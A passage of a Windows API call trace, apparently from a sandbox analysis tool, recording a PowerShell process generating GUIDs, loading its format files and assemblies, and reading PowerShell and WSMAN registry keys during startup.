	[0588.793] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x888c7cf3, Data2=0x340a, Data3=0x4a0c, Data4=([0]=0x8a, [1]=0xf2, [2]=0xcb, [3]=0x11, [4]=0x20, [5]=0x4e, [6]=0x4a, [7]=0x94))) returned 0x0
	[0588.794] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xdaf2f2aa, Data2=0x5bf9, Data3=0x40bd, Data4=([0]=0xa4, [1]=0x28, [2]=0x41, [3]=0xc2, [4]=0xbb, [5]=0x5a, [6]=0x37, [7]=0x78))) returned 0x0
	[0588.794] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x16604aa2, Data2=0x15d2, Data3=0x4c29, Data4=([0]=0xb6, [1]=0x70, [2]=0xd5, [3]=0xb3, [4]=0x97, [5]=0x12, [6]=0xac, [7]=0xed))) returned 0x0
	[0588.794] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x43dbbb63, Data2=0x1eaa, Data3=0x4442, Data4=([0]=0xb9, [1]=0xf4, [2]=0x81, [3]=0x3a, [4]=0x54, [5]=0xea, [6]=0x58, [7]=0x4d))) returned 0x0
	[0588.795] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xebbc275a, Data2=0x93b1, Data3=0x4033, Data4=([0]=0x96, [1]=0x24, [2]=0x60, [3]=0xb2, [4]=0x4, [5]=0xce, [6]=0xd5, [7]=0xbf))) returned 0x0
	[0588.801] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x233cbaaf, Data2=0x83b9, Data3=0x41dc, Data4=([0]=0xac, [1]=0x2b, [2]=0xdf, [3]=0x66, [4]=0x41, [5]=0xea, [6]=0xc0, [7]=0x29))) returned 0x0
	[0588.802] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x2e296e16, Data2=0x3265, Data3=0x4f13, Data4=([0]=0xba, [1]=0xa8, [2]=0xa6, [3]=0x46, [4]=0xa2, [5]=0xc2, [6]=0xf4, [7]=0x50))) returned 0x0
	[0588.802] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x7116f177, Data2=0x3487, Data3=0x4e75, Data4=([0]=0xbd, [1]=0x63, [2]=0x1d, [3]=0xd9, [4]=0x9a, [5]=0x9c, [6]=0xfd, [7]=0x60))) returned 0x0
	[0588.802] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x3a8e1af3, Data2=0xcd58, Data3=0x497b, Data4=([0]=0x94, [1]=0xde, [2]=0x53, [3]=0x9e, [4]=0x12, [5]=0x9c, [6]=0xa1, [7]=0x6a))) returned 0x0
	[0588.803] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x2b6c9566, Data2=0x47e8, Data3=0x49e5, Data4=([0]=0xb6, [1]=0x5f, [2]=0x1, [3]=0xc1, [4]=0x5e, [5]=0x10, [6]=0x8f, [7]=0x97))) returned 0x0
	[0588.803] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x8449a32f, Data2=0x746b, Data3=0x470f, Data4=([0]=0xaf, [1]=0x56, [2]=0xec, [3]=0xbb, [4]=0x30, [5]=0x27, [6]=0x2b, [7]=0xff))) returned 0x0
	[0588.803] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xb3e73e6c, Data2=0x4346, Data3=0x4c81, Data4=([0]=0xb8, [1]=0x2a, [2]=0xf3, [3]=0x7e, [4]=0xdb, [5]=0xfb, [6]=0x72, [7]=0xdb))) returned 0x0
	[0588.803] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x458541b5, Data2=0x28a6, Data3=0x40a8, Data4=([0]=0xb0, [1]=0x7, [2]=0x38, [3]=0xb7, [4]=0xdb, [5]=0x5e, [6]=0x6b, [7]=0x5b))) returned 0x0
	[0588.804] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x65e1f185, Data2=0x6bce, Data3=0x4163, Data4=([0]=0xb0, [1]=0xf4, [2]=0x45, [3]=0xa2, [4]=0x2c, [5]=0x6b, [6]=0xba, [7]=0x59))) returned 0x0
	[0588.805] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x25a64a70, Data2=0x75f, Data3=0x4ef7, Data4=([0]=0x9f, [1]=0xcc, [2]=0xfb, [3]=0xfa, [4]=0xf6, [5]=0x28, [6]=0x7c, [7]=0x7))) returned 0x0
	[0588.805] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x590b6656, Data2=0x6ef3, Data3=0x48d1, Data4=([0]=0x9a, [1]=0x4b, [2]=0xfb, [3]=0x5, [4]=0x6c, [5]=0x94, [6]=0x95, [7]=0x7c))) returned 0x0
	[0588.805] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x28c4f207, Data2=0xede2, Data3=0x4ff4, Data4=([0]=0x90, [1]=0x7, [2]=0xd0, [3]=0x35, [4]=0x2b, [5]=0x2e, [6]=0xc4, [7]=0x1a))) returned 0x0
	[0588.806] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x1edb153f, Data2=0xb664, Data3=0x4e4b, Data4=([0]=0xa2, [1]=0x52, [2]=0x98, [3]=0x61, [4]=0xb9, [5]=0x55, [6]=0x54, [7]=0x5))) returned 0x0
	[0588.806] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xa9dc9c84, Data2=0x1b23, Data3=0x4255, Data4=([0]=0x92, [1]=0x9e, [2]=0xe4, [3]=0xe1, [4]=0x26, [5]=0xa8, [6]=0x7d, [7]=0xa))) returned 0x0
	[0588.806] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xd24bf420, Data2=0xc6f4, Data3=0x4bde, Data4=([0]=0x99, [1]=0x16, [2]=0x47, [3]=0xa, [4]=0xc7, [5]=0x97, [6]=0xcf, [7]=0x7b))) returned 0x0
	[0588.808] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0588.808] GetFileType (hFile=0x2f8) returned 0x1
	[0588.808] SetErrorMode (uMode=0x1) returned 0x1
	[0588.808] GetFileType (hFile=0x2f8) returned 0x1
	[0588.808] ReadFile (in: hFile=0x2f8, lpBuffer=0x34d84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x34d84d0*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0590.655] ReadFile (in: hFile=0x2f8, lpBuffer=0x34d84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x34d84d0*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0590.656] ReadFile (in: hFile=0x2f8, lpBuffer=0x34d84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x34d84d0*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0590.656] ReadFile (in: hFile=0x2f8, lpBuffer=0x34d84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x34d84d0*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0590.658] ReadFile (in: hFile=0x2f8, lpBuffer=0x34d84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x34d84d0*, lpNumberOfBytesRead=0x22cf98*=0x8b4, lpOverlapped=0x0) returned 1
	[0590.658] ReadFile (in: hFile=0x2f8, lpBuffer=0x34d78ec, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x34d78ec*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
	[0590.658] ReadFile (in: hFile=0x2f8, lpBuffer=0x34d84d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x34d84d0*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
	[0590.658] CloseHandle (hObject=0x2f8) returned 1
	[0590.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0590.658] SetErrorMode (uMode=0x1) returned 0x1
	[0590.658] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22cf40 | out: lpFileInformation=0x22cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0590.659] SetErrorMode (uMode=0x1) returned 0x1
	[0590.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0590.659] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d028 | out: phkResult=0x22d028*=0x2f8) returned 0x0
	[0590.659] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cfac, lpData=0x0, lpcbData=0x22cfa8*=0x0 | out: lpType=0x22cfac*=0x1, lpData=0x0, lpcbData=0x22cfa8*=0x56) returned 0x0
	[0590.659] CoTaskMemAlloc (cb=0x5a) returned 0x3cd4f0
	[0590.659] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cf7c, lpData=0x3cd4f0, lpcbData=0x22cf78*=0x56 | out: lpType=0x22cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22cf78*=0x56) returned 0x0
	[0590.659] CoTaskMemFree (pv=0x3cd4f0) 
	[0590.660] RegCloseKey (hKey=0x2f8) returned 0x0
	[0590.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0590.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0590.663] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xcd1f737d, Data2=0x3e73, Data3=0x4c72, Data4=([0]=0x9e, [1]=0xad, [2]=0x8e, [3]=0x61, [4]=0xf, [5]=0xee, [6]=0x16, [7]=0x20))) returned 0x0
	[0590.663] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0x1238e85f, Data2=0x25f, Data3=0x4bd9, Data4=([0]=0x96, [1]=0xf6, [2]=0x49, [3]=0x9, [4]=0x83, [5]=0x5b, [6]=0x3e, [7]=0x94))) returned 0x0
	[0590.663] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0590.664] GetFileType (hFile=0x2f8) returned 0x1
	[0590.664] SetErrorMode (uMode=0x1) returned 0x1
	[0590.664] GetFileType (hFile=0x2f8) returned 0x1
	[0590.664] ReadFile (in: hFile=0x2f8, lpBuffer=0x35162b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x35162b8*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0590.668] ReadFile (in: hFile=0x2f8, lpBuffer=0x35162b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x35162b8*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0590.669] ReadFile (in: hFile=0x2f8, lpBuffer=0x35162b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x35162b8*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0590.669] ReadFile (in: hFile=0x2f8, lpBuffer=0x35162b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x35162b8*, lpNumberOfBytesRead=0x22cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0590.672] ReadFile (in: hFile=0x2f8, lpBuffer=0x35162b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x35162b8*, lpNumberOfBytesRead=0x22cf98*=0xe98, lpOverlapped=0x0) returned 1
	[0590.672] ReadFile (in: hFile=0x2f8, lpBuffer=0x35158b8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x35158b8*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
	[0590.672] ReadFile (in: hFile=0x2f8, lpBuffer=0x35162b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22cf98, lpOverlapped=0x0 | out: lpBuffer=0x35162b8*, lpNumberOfBytesRead=0x22cf98*=0x0, lpOverlapped=0x0) returned 1
	[0590.672] CloseHandle (hObject=0x2f8) returned 1
	[0590.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0590.672] SetErrorMode (uMode=0x1) returned 0x1
	[0590.672] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22cf40 | out: lpFileInformation=0x22cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0590.673] SetErrorMode (uMode=0x1) returned 0x1
	[0590.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0590.673] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d028 | out: phkResult=0x22d028*=0x2f8) returned 0x0
	[0590.673] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cfac, lpData=0x0, lpcbData=0x22cfa8*=0x0 | out: lpType=0x22cfac*=0x1, lpData=0x0, lpcbData=0x22cfa8*=0x56) returned 0x0
	[0590.673] CoTaskMemAlloc (cb=0x5a) returned 0x3cd4f0
	[0590.673] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22cf7c, lpData=0x3cd4f0, lpcbData=0x22cf78*=0x56 | out: lpType=0x22cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22cf78*=0x56) returned 0x0
	[0590.673] CoTaskMemFree (pv=0x3cd4f0) 
	[0590.674] RegCloseKey (hKey=0x2f8) returned 0x0
	[0590.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0590.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0590.677] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xea24d3d2, Data2=0x6f7, Data3=0x4d25, Data4=([0]=0x92, [1]=0xd6, [2]=0xcc, [3]=0x52, [4]=0x98, [5]=0xd, [6]=0x4a, [7]=0x80))) returned 0x0
	[0590.677] CoCreateGuid (in: pguid=0x22d250 | out: pguid=0x22d250*(Data1=0xf4b28fb0, Data2=0x6752, Data3=0x4cfa, Data4=([0]=0x9e, [1]=0x31, [2]=0x3e, [3]=0x70, [4]=0x58, [5]=0x95, [6]=0x6, [7]=0x9f))) returned 0x0
	[0590.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0590.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0592.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0592.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0592.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0592.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0592.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x22cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0592.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x22cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0592.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0592.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0592.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x22cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0592.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x22cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0592.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0592.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0593.146] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0593.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.146] CoTaskMemFree (pv=0x38e960) 
	[0593.147] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0593.148] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.148] CoTaskMemFree (pv=0x38e960) 
	[0593.149] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0593.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.150] CoTaskMemFree (pv=0x38e960) 
	[0593.151] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0593.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.151] CoTaskMemFree (pv=0x38e960) 
	[0593.162] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0593.163] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.163] CoTaskMemFree (pv=0x38e960) 
	[0593.165] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0593.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.165] CoTaskMemFree (pv=0x38e960) 
	[0593.166] CoTaskMemAlloc (cb=0x104) returned 0x38e960
	[0593.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0593.166] CoTaskMemFree (pv=0x38e960) 
	[0593.172] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d238 | out: phkResult=0x22d238*=0x2f8) returned 0x0
	[0593.175] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d13c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d138, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d13c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d138*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0593.175] CoTaskMemFree (pv=0x0) 
	[0593.176] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
